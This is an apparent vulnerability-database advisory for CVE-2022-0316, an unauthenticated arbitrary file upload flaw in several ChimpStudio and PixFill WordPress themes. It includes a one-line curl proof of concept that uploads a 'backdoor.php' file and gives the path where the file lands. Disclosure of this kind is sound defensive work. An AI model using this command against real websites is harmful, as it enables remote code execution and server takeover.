Multiple themes – Unauthenticated Arbitrary File Upload | CVE 2022-0316 | Theme Vulnerabilities

Description

Multiple themes from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.

Proof of Concept

Create a malicious file "backdoor.php", then curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F "mofile[]=@backdoor.php"

The file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php

Affects Themes

Fixed in 2.1

No known fix

No known fix

No known fix

No known fix

No known fix

No known fix

No known fix

No known fix

No known fix

References

CVE

Classification

Type

RCE

OWASP top 10

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Joshua Small

Submitter

Joshua Small

Verified

Yes

WPVDB ID

9ab3d6cf-aad7-41bc-9aae-dc5313f12f7c

Timeline

Publicly Published

2022-12-29 (about 3 years ago)

Added

2022-12-29 (about 3 years ago)

Last Updated

2022-12-29 (about 3 years ago)

Other

Published

Title

Published

2022-07-01

Title

WP All Import < 3.6.8 - Admin+ Arbitrary File Upload

Published

2025-09-26

Title

WP Recipe Maker < 10.1.0 - Unauthenticated Arbitrary Shortcode Execution

Published

2025-01-06

Title

Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator <= 1.3.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary File Upload

Published

2021-09-13

Title

EditorsKit < 1.31.6 - Contributor+ Arbitrary PHP Code Execution

Published

2025-01-21

Title

GamiPress < 7.2.2 - Unauthenticated Arbitrary Shortcode Execution via gamipress_ajax_get_logs Function